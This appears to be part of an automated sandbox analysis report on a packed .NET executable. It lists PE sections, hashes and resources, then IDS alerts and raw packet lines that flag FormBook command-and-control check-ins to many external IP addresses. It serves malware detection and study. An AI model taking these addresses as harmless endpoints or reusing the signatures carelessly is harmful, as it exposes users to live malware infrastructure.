IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xaedec | 0xaee00 | a9028e7d8e8ace1dbf0c5b8f17a7567a | False | 0.9559492829699786 | data | 7.961122101465982 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb2000 | 0x3200 | 0x3200 | f4995c5ec5ef5caa151cdeb48b4fec92 | False | 0.92625 | data | 7.768458498465549 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb6000 | 0xc | 0x200 | 2e7ea00587cbc8cdf7de247af37aaebc | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb2100 | 0x2ba6 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9886343296939324
RT_GROUP_ICON | 0xb4cb8 | 0x14 | data | | | 1.05
RT_VERSION | 0xb4cdc | 0x324 | data | | | 0.43159203980099503
RT_MANIFEST | 0xb5010 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-12T15:05:02.912694+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49790 | 3.33.130.190 | 80 | TCP
2024-09-12T15:05:31.657380+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49741 | 43.135.99.21 | 80 | TCP
2024-09-12T15:05:47.701508+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49742 | 79.125.89.83 | 80 | TCP
2024-09-12T15:05:49.944323+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49743 | 79.125.89.83 | 80 | TCP
2024-09-12T15:05:52.578611+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49744 | 79.125.89.83 | 80 | TCP
2024-09-12T15:05:55.206008+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49745 | 79.125.89.83 | 80 | TCP
2024-09-12T15:06:01.558052+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49747 | 160.251.148.115 | 80 | TCP
2024-09-12T15:06:04.084737+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49748 | 160.251.148.115 | 80 | TCP
2024-09-12T15:06:06.832873+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49749 | 160.251.148.115 | 80 | TCP
2024-09-12T15:06:09.188031+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49750 | 160.251.148.115 | 80 | TCP
2024-09-12T15:06:14.682539+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49751 | 3.33.130.190 | 80 | TCP
2024-09-12T15:06:17.225496+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49752 | 3.33.130.190 | 80 | TCP
2024-09-12T15:06:19.790824+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49753 | 3.33.130.190 | 80 | TCP
2024-09-12T15:06:22.322097+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49754 | 3.33.130.190 | 80 | TCP
2024-09-12T15:06:28.382906+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49755 | 203.161.43.228 | 80 | TCP
2024-09-12T15:06:30.954941+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49756 | 203.161.43.228 | 80 | TCP
2024-09-12T15:06:33.601631+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49757 | 203.161.43.228 | 80 | TCP
2024-09-12T15:06:36.197853+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49758 | 203.161.43.228 | 80 | TCP
2024-09-12T15:06:43.007045+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49759 | 3.33.130.190 | 80 | TCP
2024-09-12T15:06:44.485859+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49760 | 3.33.130.190 | 80 | TCP
2024-09-12T15:06:47.036755+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49761 | 3.33.130.190 | 80 | TCP
2024-09-12T15:06:49.594348+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49762 | 3.33.130.190 | 80 | TCP
2024-09-12T15:06:55.291039+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49763 | 185.199.108.153 | 80 | TCP
2024-09-12T15:06:57.638304+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49764 | 185.199.108.153 | 80 | TCP
2024-09-12T15:07:00.202554+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49765 | 185.199.108.153 | 80 | TCP
2024-09-12T15:07:02.761171+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49766 | 185.199.108.153 | 80 | TCP
2024-09-12T15:07:18.984871+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49767 | 91.184.0.200 | 80 | TCP
2024-09-12T15:07:21.647591+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49768 | 91.184.0.200 | 80 | TCP
2024-09-12T15:07:24.253464+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49769 | 91.184.0.200 | 80 | TCP
2024-09-12T15:07:26.677164+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49770 | 91.184.0.200 | 80 | TCP
2024-09-12T15:07:32.867699+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49771 | 154.23.176.197 | 80 | TCP
2024-09-12T15:07:35.362763+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49772 | 154.23.176.197 | 80 | TCP
2024-09-12T15:07:38.183068+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49773 | 154.23.176.197 | 80 | TCP
2024-09-12T15:07:40.502677+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49774 | 154.23.176.197 | 80 | TCP
2024-09-12T15:07:47.152302+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49775 | 45.113.201.77 | 80 | TCP
2024-09-12T15:07:49.683729+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49776 | 45.113.201.77 | 80 | TCP
2024-09-12T15:07:52.206347+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49777 | 45.113.201.77 | 80 | TCP
2024-09-12T15:07:55.526268+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49778 | 45.113.201.77 | 80 | TCP
2024-09-12T15:08:01.064027+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49779 | 76.223.113.161 | 80 | TCP
2024-09-12T15:08:03.599426+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49780 | 76.223.113.161 | 80 | TCP
2024-09-12T15:08:06.213488+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49781 | 76.223.113.161 | 80 | TCP
2024-09-12T15:08:08.786856+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49782 | 76.223.113.161 | 80 | TCP
2024-09-12T15:08:22.883446+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49783 | 84.32.84.37 | 80 | TCP
2024-09-12T15:08:25.443626+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49784 | 84.32.84.37 | 80 | TCP
2024-09-12T15:08:27.981899+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49785 | 84.32.84.37 | 80 | TCP
2024-09-12T15:08:30.549061+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49786 | 84.32.84.37 | 80 | TCP
2024-09-12T15:08:36.171879+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49787 | 3.33.130.190 | 80 | TCP
2024-09-12T15:08:38.741159+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49788 | 3.33.130.190 | 80 | TCP
2024-09-12T15:08:42.214171+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49789 | 3.33.130.190 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Sep 12, 2024 15:06:08.374794006 CEST4975080192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:08.382653952 CEST4975080192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:08.387665987 CEST8049750160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:09.187525988 CEST8049750160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:09.187980890 CEST8049750160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:09.188030958 CEST4975080192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:09.190373898 CEST4975080192.168.2.4160.251.148.115
                                                              Sep 12, 2024 15:06:09.195274115 CEST8049750160.251.148.115192.168.2.4
                                                              Sep 12, 2024 15:06:14.215421915 CEST4975180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:14.220478058 CEST80497513.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:14.220587969 CEST4975180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:14.231529951 CEST4975180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:14.236557961 CEST80497513.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:14.682461977 CEST80497513.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:14.682538986 CEST4975180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:15.741221905 CEST4975180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:15.747694969 CEST80497513.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:16.761086941 CEST4975280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:16.766371012 CEST80497523.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:16.766506910 CEST4975280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:16.786643982 CEST4975280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:16.791783094 CEST80497523.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:17.225414991 CEST80497523.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:17.225496054 CEST4975280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:18.288062096 CEST4975280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:18.293126106 CEST80497523.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.308552980 CEST4975380192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:19.313868046 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.314018011 CEST4975380192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:19.327594995 CEST4975380192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:19.332693100 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.332743883 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.332756042 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.332782030 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.332848072 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.333096981 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.333111048 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.333122969 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.333133936 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.790730953 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:19.790823936 CEST4975380192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:20.834836006 CEST4975380192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:20.840006113 CEST80497533.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:21.854376078 CEST4975480192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:21.859500885 CEST80497543.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:21.859602928 CEST4975480192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:21.866998911 CEST4975480192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:21.872330904 CEST80497543.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:22.321814060 CEST80497543.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:22.322020054 CEST80497543.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:22.322097063 CEST4975480192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:22.324879885 CEST4975480192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:22.330367088 CEST80497543.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:27.784475088 CEST4975580192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:27.789442062 CEST8049755203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:27.789532900 CEST4975580192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:27.802988052 CEST4975580192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:27.807946920 CEST8049755203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:28.382606030 CEST8049755203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:28.382797003 CEST8049755203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:28.382905960 CEST4975580192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:29.319169044 CEST4975580192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:30.340261936 CEST4975680192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:30.346201897 CEST8049756203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:30.346271038 CEST4975680192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:30.358347893 CEST4975680192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:30.363336086 CEST8049756203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:30.952228069 CEST8049756203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:30.954849958 CEST8049756203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:30.954941034 CEST4975680192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:31.866072893 CEST4975680192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:32.899410963 CEST4975780192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:32.904697895 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:32.905008078 CEST4975780192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:32.996753931 CEST4975780192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:33.002003908 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002017975 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002036095 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002043962 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002052069 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002059937 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002068043 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002203941 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002230883 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.600950956 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.601397991 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.601630926 CEST4975780192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:34.506875992 CEST4975780192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:35.557827950 CEST4975880192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:35.562953949 CEST8049758203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:35.563101053 CEST4975880192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:35.570231915 CEST4975880192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:35.576900959 CEST8049758203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:36.196917057 CEST8049758203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:36.197787046 CEST8049758203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:36.197853088 CEST4975880192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:36.199809074 CEST4975880192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:36.206242085 CEST8049758203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:41.483519077 CEST4975980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:41.488660097 CEST80497593.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:41.488886118 CEST4975980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:41.497684002 CEST4975980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:41.502890110 CEST80497593.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:43.007045031 CEST4975980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:43.013887882 CEST80497593.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:43.013998985 CEST4975980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:44.026134968 CEST4976080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:44.031508923 CEST80497603.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:44.031593084 CEST4976080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:44.043433905 CEST4976080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:44.048696995 CEST80497603.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:44.485788107 CEST80497603.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:44.485858917 CEST4976080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:45.553591013 CEST4976080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:45.558789968 CEST80497603.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.573417902 CEST4976180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:46.578778028 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.578850985 CEST4976180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:46.591907978 CEST4976180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:46.596898079 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.596959114 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.596987963 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.597014904 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.597044945 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.597177982 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.597208023 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.597321033 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.597347975 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:47.033839941 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:47.036755085 CEST4976180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:48.100488901 CEST4976180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:48.105520964 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:49.120745897 CEST4976280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:49.125941992 CEST80497623.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:49.128792048 CEST4976280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:49.136720896 CEST4976280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:49.141731977 CEST80497623.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:49.589215040 CEST80497623.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:49.589678049 CEST80497623.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:49.594347954 CEST4976280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:49.594348907 CEST4976280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:49.599298954 CEST80497623.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:54.639322042 CEST4976380192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:54.644344091 CEST8049763185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:54.644431114 CEST4976380192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:54.656380892 CEST4976380192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:54.661299944 CEST8049763185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:55.290832043 CEST8049763185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:55.290935993 CEST8049763185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:55.290949106 CEST8049763185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:55.291038990 CEST4976380192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:56.163054943 CEST4976380192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:57.184756041 CEST4976480192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:57.190061092 CEST8049764185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:57.190253019 CEST4976480192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:57.204737902 CEST4976480192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:57.210239887 CEST8049764185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:57.637331963 CEST8049764185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:57.638134003 CEST8049764185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:57.638303995 CEST4976480192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:58.712753057 CEST4976480192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:59.728809118 CEST4976580192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:59.739875078 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.740281105 CEST4976580192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:59.751956940 CEST4976580192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:59.757107019 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757152081 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757179022 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757205009 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757236958 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757591963 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757618904 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757673979 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757702112 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:00.195352077 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:00.202491045 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:00.202553988 CEST4976580192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:07:01.256851912 CEST4976580192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:07:02.275281906 CEST4976680192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:07:02.280498028 CEST8049766185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:02.280571938 CEST4976680192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:07:02.288429022 CEST4976680192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:07:02.293375015 CEST8049766185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:02.760704041 CEST8049766185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:02.760962009 CEST8049766185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:02.761171103 CEST4976680192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:07:02.767030954 CEST4976680192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:07:02.772057056 CEST8049766185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:18.328285933 CEST4976780192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:18.333364010 CEST804976791.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:18.333456039 CEST4976780192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:18.346549988 CEST4976780192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:18.352078915 CEST804976791.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:18.982920885 CEST804976791.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:18.983098984 CEST804976791.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:18.984870911 CEST4976780192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:19.932545900 CEST4976780192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:20.947710991 CEST4976880192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:20.952877045 CEST804976891.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:20.953211069 CEST4976880192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:20.965218067 CEST4976880192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:20.970757008 CEST804976891.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:21.647376060 CEST804976891.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:21.647412062 CEST804976891.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:21.647424936 CEST804976891.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:21.647591114 CEST4976880192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:22.475610971 CEST4976880192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:23.496038914 CEST4976980192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:23.501050949 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:23.504962921 CEST4976980192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:23.516911030 CEST4976980192.168.2.491.184.0.200
